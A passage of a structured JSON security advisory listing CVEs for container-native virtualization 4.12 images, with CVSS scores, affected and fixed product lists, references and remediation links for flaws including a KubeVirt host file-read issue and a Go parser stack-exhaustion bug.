"attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: net/http: improper sanitization of Transfer-Encoding header" }, { "acknowledgments": [ { "names": [ "Oliver Brooks and James Klopchic" ], "organization": "NCC Group" } ], "cve": "CVE-2022-1798", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2022-08-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2117872" } ], "notes": [ { "category": "description", "text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", "title": "Vulnerability description" }, { "category": "summary", "text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1798" }, { "category": "external", "summary": "RHBZ#2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1798" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798" }, { "category": "external", "summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm" } ], "release_date": "2022-08-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs" }, { "cve": "CVE-2022-1962", "cwe": { "id": "CWE-1325", "name": "Improperly Controlled Sequential Memory Allocation" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107376" } ], "notes": [ { "category": "description", "text": "A flaw was found in the golang standard library, go/parser. When calling any Parse functions on the Go source code, which contains deeply nested types or declarations, a panic can occur due to stack exhaustion. This issue allows an attacker to impact system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: go/parser: stack exhaustion in all Parse* functions", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", 